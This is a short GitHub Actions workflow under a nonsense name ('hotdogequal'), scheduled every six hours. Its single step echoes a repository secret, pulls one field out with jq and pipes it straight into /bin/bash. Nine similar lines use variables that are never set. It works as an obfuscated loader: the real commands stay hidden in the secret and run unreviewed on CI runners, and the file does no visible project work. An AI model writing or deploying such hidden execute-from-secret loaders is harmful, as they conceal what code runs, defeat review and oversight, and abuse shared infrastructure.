name: hotdogequal

on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hotdogequal
        env:
          vq3: ${{ secrets.vq3 }}
        run: |
          echo $vq3 | jq -r .tnhxa450 | /bin/bash
          echo $ilth4447 | jq -r .jgbag66290 | /bin/bash
          echo $czqh5 | jq -r .xenxo3 | /bin/bash
          echo $bomq3 | jq -r .q1 | /bin/bash
          echo $kdwm7102 | jq -r .ho4761 | /bin/bash
          echo $zrdes603 | jq -r .hyfq64808 | /bin/bash
          echo $pwauz7 | jq -r .jha258 | /bin/bash
          echo $clb6670 | jq -r .sml3720 | /bin/bash
          echo $sa38 | jq -r .jsnx1018 | /bin/bash
          echo $ic9074 | jq -r .v0335 | /bin/bash

